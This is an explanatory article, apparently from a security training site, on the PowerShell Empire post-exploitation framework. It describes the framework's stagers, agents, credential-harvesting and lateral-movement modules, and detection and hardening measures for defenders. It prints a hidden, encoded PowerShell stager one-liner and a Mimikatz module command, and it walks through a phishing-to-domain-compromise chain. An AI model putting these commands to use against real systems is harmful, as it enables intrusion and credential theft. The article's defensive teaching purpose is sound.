PowerShell Empire Framework
Post-exploitation framework using PowerShell agents for in-memory operations, credential harvesting, and lateral movement.
Continue your mission
Post-exploitation framework using PowerShell agents for in-memory operations, credential harvesting, and lateral movement.
# PowerShell Empire Framework
PowerShell Empire is a post-exploitation framework designed for adversary simulation, red team operations, and, frequently, real-world intrusion campaigns. It solves a specific operational problem for attackers and testers alike: how to maintain persistent, flexible control over a compromised host without dropping detectable executables to disk. By conducting all operations through PowerShell's runtime environment and the .NET framework, Empire achieves a degree of stealth that disk-based malware rarely matches. Its architecture reflects a broader shift in offensive security tradecraft toward living-off-the-land techniques, where the operating system's own tools become the weapon. Security professionals who understand Empire's mechanics understand the template that modern threat actors follow, regardless of whether those actors use Empire itself.
---
PowerShell Empire is an open-source, modular post-exploitation framework originally released by the Harmj0y, sixdub, and engima0x3 team in 2015. It operates primarily through PowerShell agents on Windows targets, with a Python-based server handling command-and-control (C2) infrastructure. The framework is explicitly designed for the post-exploitation phase of an intrusion: it assumes the attacker already has an initial foothold and focuses on what happens next, including credential theft, lateral movement, persistence, and data collection.
Empire is not a vulnerability scanner, an exploit delivery platform, or a network reconnaissance tool in the traditional sense. It does not exploit software vulnerabilities to gain initial access. Distinguishing Empire from tools like Metasploit is important: Metasploit covers the full attack lifecycle including exploitation, while Empire specializes in the phase after access is gained.
Variants and successors matter here. The original PowerShell Empire project was officially deprecated in 2019, but the BC-Security fork (Empire 4.x and beyond) continued active development and remains in widespread use across both red team engagements and, according to multiple threat intelligence reports, actual intrusion campaigns. A Python-based agent extension called Starkiller added a graphical front end. The framework also inspired related projects including Covenant (C# based), Merlin (Go based), and Havoc, all of which follow similar architectural philosophies.
Empire is not equivalent to a RAT (Remote Access Trojan) in the traditional sense, though it provides overlapping capabilities. The distinction lies in design intent and architecture: Empire is a framework with composable modules rather than a monolithic implant.
---
Empire's architecture rests on three core components: listeners, stagers, and agents. Understanding how these interact explains why the framework is both powerful and difficult to detect with conventional tools.
Listeners are the server-side processes that wait for incoming connections from compromised machines. Empire supports multiple listener types including HTTP, HTTPS, and malleable profiles that mimic legitimate web traffic. A common configuration mimics the communication patterns of known content delivery networks or popular web services, making network-level detection harder. The listener configuration determines how often agents check in (the callback interval), what HTTP headers to use, and how to handle dropped connections.
Stagers are the delivery mechanism. A stager is a small, lightweight piece of code whose sole job is to pull down the full Empire agent and execute it in memory. A typical stager might be a one-liner PowerShell command that downloads and executes a Base64-encoded payload using the Invoke-Expression (IEX) cmdlet combined with a web client call. For example:
powershell -NoP -sta -NonI -W Hidden -Enc [BASE64_ENCODED_PAYLOAD]This stager bypasses execution policy, runs without a visible window, and executes entirely in memory. The encoded payload contacts the listener and retrieves the full agent. Because nothing is written to disk, traditional antivirus solutions that scan files at rest have nothing to scan.
Agents are the persistent implants that run on the compromised host. Once an agent checks in, the operator gains an interactive session. The agent communicates with the listener on a configurable schedule, retrieving task instructions and returning results. All communication is encrypted, typically using AES-256, with keys negotiated during the initial staging process.
Once an agent is active, the operator accesses a module library covering several attack categories:
Credential harvesting uses Mimikatz integration to dump password hashes, Kerberos tickets, and plaintext credentials from LSASS memory. The operator runs a command like usemodule credentials/mimikatz/logonpasswords, and the module executes Mimikatz entirely in memory using PowerShell reflection, never touching disk.
Lateral movement modules include options for Pass-the-Hash, Pass-the-Ticket, and WMI-based remote execution. An operator can take harvested credentials and pivot to additional hosts on the same network without ever using a traditional exploitation technique.
Persistence modules write to common persistence locations: scheduled tasks, registry run keys, WMI event subscriptions, and startup folders. Each method has different detection profiles, and Empire makes it easy to rotate between them.
Situational awareness modules enumerate local administrators, domain controllers, active sessions, and network shares, building a picture of the environment that guides further operations.
A concrete scenario: A phishing email delivers a malicious Office document with a macro. The macro executes a PowerShell stager that calls back to the Empire listener. The agent checks in. The operator runs Mimikatz in memory and retrieves the domain administrator's NTLM hash. Using a Pass-the-Hash module, the operator authenticates to the domain controller, runs a new stager on that host, and has a second agent with domain-level privileges. The entire chain, from initial phishing to domain compromise, leaves minimal disk artifacts. The only forensic trail is in PowerShell logs, Windows event logs, and network traffic, and only if those are properly configured and monitored.
This scenario is not hypothetical. Variants of this chain appear in multiple documented intrusion reports involving threat actors including APT19, FIN7-adjacent groups, and various ransomware precursor campaigns.
Detection considerations for defenders: Empire's primary detection surface is behavioral. Script block logging (Windows Event ID 4104) captures PowerShell commands as they execute, including decoded versions of obfuscated payloads. AMSI (Antimalware Scan Interface) allows security products to inspect scripts before execution. Constrained Language Mode restricts PowerShell to a subset of functionality that prevents many Empire modules from running. Network-based detection focuses on identifying beaconing patterns and anomalous HTTP traffic profiles.
---
Empire matters because it codified and packaged techniques that were previously the domain of nation-state actors and made them accessible to any attacker with basic technical skills. The framework's release in 2015 created a measurable shift in how defenders had to think about endpoint security.
Before Empire's wide adoption, many organizations treated PowerShell as a trusted administrative tool, exempt from the scrutiny applied to executable files. Empire exposed that assumption as catastrophically wrong. The result was a direct industry response: Microsoft introduced Script Block Logging in PowerShell 5.0, expanded AMSI coverage, and added Constrained Language Mode. CIS Controls and NIST guidance were updated to explicitly address PowerShell logging requirements. These defensive improvements were not theoretical exercises; they were responses to documented attacker behavior that Empire made visible and repeatable in red team testing.
The misconception most worth addressing is that Empire's official deprecation in 2019 made it irrelevant. It did not. The BC-Security fork remains active. More importantly, Empire's techniques have been absorbed into the broader threat actor toolkit. Groups do not need Empire itself; they need the concepts, and those concepts appear regularly in threat intelligence reporting. MITRE ATT&CK documents dozens of techniques that map directly to Empire modules, including T1059.001 (PowerShell), T1003 (OS Credential Dumping), T1021 (Remote Services), and T1053 (Scheduled Task/Job).
A documented consequence: The 2017 SANS incident analysis of several healthcare sector intrusions found that attackers used Empire-based tradecraft to move laterally for weeks before detection. The average dwell time in those cases exceeded 90 days. The attackers harvested credentials, pivoted across clinical and administrative networks, and established multiple persistence mechanisms. The damage included both data exposure and operational disruption. The root failure was not a missing patch; it was inadequate PowerShell visibility and no behavioral detection capability.
The business impact extends beyond incident response costs. Regulatory frameworks including HIPAA, PCI-DSS, and SOC 2 require organizations to demonstrate that they can detect and respond to this class of intrusion. An organization that cannot detect in-memory PowerShell execution has a compliance gap as well as a security gap. Understanding Empire is not academic; it is a requirement for building detection engineering programs that satisfy both security objectives and regulatory requirements.
---
CDA approaches the PowerShell Empire Framework through the Planetary Defense Model (PDM), primarily under the Threat Intelligence Domain (TID) with secondary relevance to Vulnerability and System Defense (VSD). The PDM methodology here is Predictive Defense Intelligence (PDI): see the threat before it sees you.
From a PDI standpoint, Empire is a forcing function for detection engineering maturity. CDA analysts do not treat Empire as a solved problem just because it is well-documented. Instead, they treat it as a baseline: any organization that cannot detect Empire-style tradecraft in their environment has not cleared the minimum bar for post-exploitation visibility. PDI means building detection logic ahead of attacker actions, not in response to confirmed incidents.
Operationally, CDA applies Empire knowledge in three ways. First, threat modeling exercises use Empire's module library as a reference catalog for attacker capability. If a client environment cannot detect a specific Empire module, that gap is logged as a TID finding and tracked against MITRE ATT&CK technique mappings. Second, red team assessments include Empire-based scenarios explicitly to test whether defensive controls (AMSI, Script Block Logging, endpoint detection and response tools) perform as configured. Third, intelligence products that CDA produces for clients include Empire-variant indicators, covering both the BC-Security fork and Empire-inspired tooling observed in active campaigns.
What CDA does differently is connect the framework's mechanics directly to a client's specific detection stack. Generic guidance says "enable Script Block Logging." CDA guidance says "your SIEM is ingesting Windows Event ID 4104, but your detection rule filters out events from administrative service accounts, which is exactly the account an Empire agent would run under in this environment." That specificity is the difference between a checkbox and a working detection.
VSD relevance covers the hardening side: enforcing Constrained Language Mode in environments where it is feasible, restricting PowerShell execution policy to signed scripts, and auditing which accounts have the right to run PowerShell remotely. These controls directly degrade Empire's operational effectiveness.
---
---
---
CDA Theater missions that address topics covered in this article.
Guide to AWS Security Hub for centralized finding aggregation, continuous compliance monitoring, and automated remediation across AWS organizations.
Vendor assessment guide for HashiCorp Vault.
Wireshark is the leading network protocol analyzer for traffic capture and security investigation.
Written by CDA Editorial
Found an issue? Help improve this article.